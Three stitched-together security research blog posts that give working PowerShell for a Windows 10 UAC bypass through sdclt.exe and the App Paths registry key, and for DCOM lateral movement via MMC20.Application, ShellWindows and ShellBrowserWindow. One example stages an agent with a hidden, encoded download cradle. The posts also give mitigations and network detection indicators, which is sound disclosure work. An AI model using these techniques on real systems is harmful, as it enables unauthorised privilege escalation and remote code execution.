Over the past several months, I’ve taken an interest in Microsoft’s User Account Control (UAC) feature in Windows. While Microsoft doesn’t define UAC as a security boundary, bypassing this protection is still something attackers frequently need to do. The recent Vault7 leak confirms that bypassing UAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump. On the purposefully public side, check out the UACME project by @hfiref0x for a great collection of existing techniques.

Microsoft seems to have a renewed interest in UAC, finally fixing many of the issues highlighted by publicly disclosed bypasses. While these fixes are only in newer versions of Windows, the active response from Microsoft drives me to continue searching for UAC bypasses. I’ve previously blogged about two different bypass techniques, and this post will highlight an alternative method that also doesn’t rely on the IFileOperation/DLL hijacking approach. This technique works on Windows 10 build 15031, where the vast majority of public bypasses have been patched.

As some of you may know, there are some Microsoft signed binaries that auto-elevate due to their manifest. You can read more about these binaries and their manifests here. While searching for more of these auto-elevating binaries by using the SysInternals tool “sigcheck“, I came across “sdclt.exe” and verified that it auto-elevates due to its manifest:

*Note: This only works on Windows 10. The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”, preventing auto-elevation when started from medium integrity.

When observing the execution flow of sdclt.exe, it becomes apparent that this binary starts control.exe in order to open up a Control Panel item in high-integrity context:

I became curious how sdclt.exe obtains the path to control.exe. Looking again at the execution flow, sdclt.exe queries the App Path key for control.exe within the HKEY_CURRENT_USER hive.

Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with. In this case, I saw that “sdclt.exe” was querying HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe. If you aren’t familiar with App Paths in Windows, you can read more about the topic here.

As it stands, sdclt.exe looks for the App Path of control.exe in the HKCU hive. Essentially, this binary is asking “what is the full path of control.exe?”. If that key isn’t found, it continues the typical Windows search order. Since it is searching in a place that can be modified, we can populate the key.
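
A minimal sketch of populating that key and triggering the binary (the payload path is a placeholder; the linked Invoke-AppPathBypass.ps1 below automates this):

# Point the control.exe App Path at our payload, then start sdclt.exe
$key = "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe"
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name "(default)" -Value "C:\Windows\System32\cmd.exe"
Start-Process "$env:SystemRoot\System32\sdclt.exe"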

Guess what happens once sdclt.exe is started again? You guessed it. Sdclt.exe queried our newly created App Paths key for control.exe, resulting in cmd.exe getting returned.

Looking at Process Explorer (or whoami /groups), I was able to confirm that cmd.exe is indeed high integrity:

It is important to note that this technique does not allow for parameters, meaning it requires your payload to be placed on disk someplace. If you try to give the binary any parameters (e.g., C:\Windows\System32\cmd.exe /c calc.exe), it will interpret the entire string as the lpFile value of the ShellExecuteInfo structure, which is then passed over to ShellExecuteEx. Since that value doesn’t exist, it will not execute.

To demonstrate this technique, you can find a script here: https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1

The script takes a full path to your payload. C:\Windows\System32\cmd.exe is a good one to validate. It will automatically add the keys, start sdclt.exe and then cleanup.

This particular technique can be remediated or fixed by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group. Further, if you would like to monitor for this attack, you could utilize methods/signatures to look for and alert on new registry entries in HKCU\Microsoft\Windows\CurrentVersion\App Paths\Control.exe.

Cheers,
Matt

Lateral Movement via DCOM: Round 2

Most of you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system.

This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:

empty_launch_permissions

You can read more on that thread here. This got me thinking about other objects that have no explicit LaunchPermission set. Viewing these permissions can be achieved using @tiraniddo’s OleView .NET, which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: “ShellBrowserWindow” and “ShellWindows”:

interesting_objects

Another way to identify potential target objects is to look for the value “LaunchPermission” missing from keys in HKCR:\AppID\{guid}. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:

launch_permissions_registry

Those with no explicit LaunchPermission set will be missing that specific registry entry.
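
A rough PowerShell sketch of that enumeration approach:

# List AppID keys that have no explicit LaunchPermission value
Get-ChildItem "Registry::HKEY_CLASSES_ROOT\AppID" -ErrorAction SilentlyContinue |
    Where-Object { $_.GetValue("LaunchPermission") -eq $null } |
    Select-Object -ExpandProperty PSChildName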

The first object I explored was the “ShellWindows” instance. Since there is no ProgID associated with this object, we can use the Type.GetTypeFromCLSID .NET method paired with the Activator.CreateInstance method to instantiate the object via its AppID on a remote host. In order to do this, we need to get the AppID CLSID for the ShellWindows object, which can be accomplished using OleView .NET as well:

[Edit] Thanks to @tiraniddo for pointing it out, the instantiation portions should have read “CLSID” instead of “AppID”. This has been corrected below.

[Edit] Replaced screenshot of AppID with CLSID

shellwindow_classid

As you can see below, the “Launch Permission” field is blank, meaning no explicit permissions are set.

screen-shot-2017-01-23-at-4-12-24-pm

Now that we have the CLSID, we can instantiate the object on a remote target:

remote_instantiation_shellwindows
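
In PowerShell, that instantiation might look roughly like the following, using the GUID listed for “ShellWindows” at the end of this post (the target IP is a placeholder):

# Instantiate ShellWindows on the remote target via its CLSID
$clsid = [Guid]"9BA05972-F6A8-11CF-A442-00A0C90A8F39"
$shellWindows = [Activator]::CreateInstance([Type]::GetTypeFromCLSID($clsid, "192.168.99.132"))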

With the object instantiated on the remote host, we can interface with it and invoke any methods we want. The returned handle to the object reveals several methods and properties, none of which we can interact with. In order to achieve actual interaction with the remote host, we need to access the ShellWindows.Item method, which will give us back an object that represents the Windows shell window:

item_instantiation

With a full handle on the Shell Window, we can now access all of the expected methods/properties that are exposed. After going through these methods, “Document.Application.ShellExecute” stood out. Be sure to follow the parameter requirements for the method, which are documented here.
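
Continuing the sketch above, the call chain might look roughly like this (the command and arguments are purely illustrative):

# Grab the shell window item, then invoke ShellExecute through it
$item = $shellWindows.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "C:\Windows\System32", $null, 0)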

shellwindows_command_execution

As you can see above, our command was executed on a remote host successfully.

Now that the “ShellWindows” object was tested and validated, I moved onto the “ShellBrowserWindow” object. One of the first things I noticed was that this particular object does not exist on Windows 7, making its use for lateral movement a bit more limited than the “ShellWindows” object, which I tested successfully on Windows 7 through Windows 10. The “ShellBrowserWindow” object was, however, tested successfully on Windows 10 and Server 2012 R2.

I took the same enumeration steps on the “ShellBrowserWindow” object as I did with the “ShellWindows” object. Based on my enumeration of this object, it appears to effectively provide an interface into the Explorer window just as the previous object does. To instantiate this object, we need to get its AppID CLSID. Similar to above, we can use OleView .NET:

[Edit] Replaced screenshot of AppID with CLSID

shellbrowser_classid

Again, take note of the blank Launch Permission field 🙂

screen-shot-2017-01-23-at-4-13-52-pm

With the AppID CLSID, we can repeat the steps taken on the previous object to instantiate the object and call the same method:

shellbrowserwindow_command_execution

As you can see, the command successfully executed on the remote target.

Since this object interfaces directly with the Windows shell, we don’t need to invoke the “ShellWindows.Item” method, as on the previous object.

While these two DCOM objects can be used to run shell commands on a remote host, there are plenty of other interesting methods that can be used to enumerate or tamper with a remote target. A few of these methods include:

  • Document.Application.ServiceStart()
  • Document.Application.ServiceStop()
  • Document.Application.IsServiceRunning()
  • Document.Application.ShutDownWindows()
  • Document.Application.GetSystemInformation()

Defenses

You may ask, what can I do to mitigate or detect these techniques? One option is to enable the Domain Firewall, as this prevents DCOM instantiation by default. While this mitigation works, there are methods for an attacker to tamper with the Windows firewall remotely (one being remotely stopping the service).

There is also the option of changing the default “LaunchPermissions” for all DCOM objects via dcomcnfg.exe by right clicking on “My Computer”, selecting “Properties” and selecting “Edit Default” under “Launch and Activation Permissions”. You can then select the Administrators group and uncheck “Remote Launch” and “Remote Activation”:

dcom_default_lockdown

Attempted instantiation of an object results in “Access Denied”:

remote_instantiation_failure

You can also explicitly set the permissions on the suspect DCOM objects to remove RemoteActivate and RemoteLaunch permissions from the Local Administrators group. To do so, you will need to take ownership of the DCOM’s HKCR AppID key, change the permissions via the Component Services MMC snap-in and then change the ownership of the DCOM’s HKCR AppID key back to TrustedInstaller. For example, this is the process of locking down the “ShellWindows” object.

First, take ownership of HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}. The GUID will be the AppID of the DCOM object; finding this was discussed above. You can achieve this by going into regedit, right clicking on the key and selecting “Permissions”. From there, you will find the “Ownership” tab under “Advanced”.

dcom_registry_ownership

As you can see above, the current owner is “TrustedInstaller”, meaning you can’t currently modify the contents of the key. To take ownership, click “Other Users or Groups” and add “Administrators” if it isn’t already there and click “Apply”:

apply_ownership

Now that you have ownership of the “ShellWindows” AppID key, you will need to make sure the Administrators group has “FullControl” over the AppID key of the DCOM object. Once done, open the “Component Services” MMC snap-in, browse to “ShellWindows”, right click on it and select “Properties”. To modify the Remote Activation and Launch permissions, you will need to go over to the “Security” tab. If you successfully took ownership of the AppID key belonging to the DCOM object, the radio buttons for the security options should *not* be grayed out.

edit_default_dcom_perms

To modify the Launch and Activation permissions, click the “Edit” button under the “Launch and Activation Permissions” section. Once done, select the Administrators group and uncheck “Remote Activation” and “Remote Launch”. Click “OK” and then “Apply” to apply the changes.

remove_perms_dcom

Now that the Remote Activation and Launch permissions have been removed from the Administrators group, you will need to give ownership of the AppID key belonging to the DCOM object back to the TrustedInstaller account. To do so, go back to the HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39} registry key and navigate back to the “Other Users and Groups” section under the owner tab. To add the TrustedInstaller account back, you will need to change the “Location” to the local host and enter “NT SERVICE\TrustedInstaller” as the object name:

trustedinstaller_restore

Click “OK” and then “Apply” to change the owner back.

One important note: Since we gave “Administrators” the “FullControl” permission on the AppID key belonging to the DCOM object, it is critical to remove that permission by unchecking the “FullControl” box for the Administrators group. Since the updated DCOM permissions are stored as “LaunchPermission” under that key, an attacker could simply delete that value remotely, opening the DCOM object back up if it is not properly secured.

After making these changes, you should see that instantiation of that specific DCOM object is no longer allowed remotely:

remote_instantiation_failure

Keep in mind that while this mitigation does restrict the launch permissions of the given DCOM object, an attacker could theoretically remotely take ownership of the key and disable the mitigation since it is stored in the registry.

There is the option of disabling DCOM, which you can read about here. I have not tested to see if this breaks anything at scale, so proceed with caution.

As a reference, the three DCOM objects I have found that allow for remote code execution are as follows:

MMC20.Application (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 7e0423cd-1119-0928-900c-e6d4a52a0715

ShellWindows  (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 9BA05972-F6A8-11CF-A442-00A0C90A8F39

ShellBrowserWindow (Tested Windows 10, Server 2012R2)
AppID: C08AFD90-F2A1-11D1-8455-00A0C91F3880

It should also be noted that there may be other DCOM objects allowing for similar actions performed remotely. These are simply the ones I have found so far.

Full Disclosure: I encourage anyone who implements these mitigations to test them extensively before integrating at scale. As with any system configuration change, it is highly encouraged to extensively test it to ensure nothing breaks. I have not tested these mitigations at scale.

As for detection, there are a few things you can look for at the network level. When capturing the execution of this technique in Wireshark, you will likely see an influx of DCERPC traffic, followed by some indicators.

First, when the object is instantiated remotely, you may notice a “RemoteGetClassObject” request via ISystemActivator:

isystemactivator_getclassobject

Following that, you will likely see “GetTypeInfo” requests from IDispatch along with “RemQueryInterface” requests via IRemUnknown2:

idispatch_gettypeinfo

While this may, in most cases, look like normal DCOM/RPC traffic (to an extent), one large indicator of this technique being executed will be a request via IDispatch of GetIDsOfNames for “ShellExecute”:

method_enumeration

Immediately following that request, you will see a treasure trove of useful information via an “Invoke Request”, including *exactly* what was executed via the ShellExecute method:

method_params_over_wire

That will immediately be followed by the response code of the method execution (0 being success). This is what the actual execution of commands via this method looks like:

shellexecute_returncode

Cheers!
Matt N.

Lateral Movement using the MMC20.Application COM Object

For those of you who conduct pentests or red team assessments, you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system.

Recently, I have been digging into COM (Component Object Model) internals. My interest in researching new lateral movement techniques led me to DCOM (Distributed Component Object Model), due to the ability to interact with the objects over the network. Microsoft has some good documentation on DCOM here and on COM here. You can find a solid list of DCOM applications using PowerShell, by running “Get-CimInstance Win32_DCOMApplication”.

While enumerating the different DCOM applications, I came across the MMC Application Class (MMC20.Application). This COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named “ExecuteShellCommand” under Document.ActiveView.

executeshellcommad_method

You can read more on that method here. So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.

Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by using “[activator]::CreateInstance([type]::GetTypeFromProgID”. All you need to do is provide it a DCOM ProgID and an IP address. It will then provide you back an instance of that COM object remotely:

remote_instantiation

It is then possible to invoke the “ExecuteShellCommand” method to start a process on the remote host:

start_remote_process
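
A minimal sketch of the two steps above (the IP address and command are placeholders):

# Instantiate MMC20.Application on the target, then call ExecuteShellCommand
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application", "192.168.99.132"))
$com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe", $null, $null, "7")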

As you can see, calc.exe is running under Matt while the user “Jason” is logged in:

process_validation

By using this DCOM application and the associated method, it is possible to pivot to a remote host without using psexec, WMI, or other well-known techniques.

To further demonstrate this, we can use this technique to execute an agent, such as Cobalt Strike’s Beacon, on a remote host. Since this is a lateral movement technique, it requires administrative privileges on the remote host:

validate_admin_beacon

As you can see, the user “Matt” has local admin rights on “192.168.99.132”. You can then use the ExecuteShellCommand method of MMC20.Application to execute staging code on the remote host. For this example, a simple encoded PowerShell download cradle is specified. Be sure to pay attention to the requirements of “ExecuteShellCommand” as the program and its parameters are separated:

command1
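
Reusing the $com handle from the sketch above, the separated program/parameter call might look roughly like this (the encoded cradle is a placeholder):

# The program and its parameters are passed as separate arguments to ExecuteShellCommand
$ps = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$cradle = "-nop -w hidden -enc <BASE64_ENCODED_CRADLE>"
$com.Document.ActiveView.ExecuteShellCommand($ps, $null, $cradle, "7")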

The result of executing this through an agent results in obtaining access to the remote target:

execution

To detect/mitigate this, defenders can disable DCOM, block RPC traffic between workstations, and look for a child process spawning off of “mmc.exe”.

Edit: After some investigating and back & forth with James Forshaw, it appears that the Windows Firewall will block this technique by default. As an additional mitigation, ensure the Windows Firewall is enabled and “Microsoft Management Console” isn’t an enabled rule.

Cheers!
Matt N.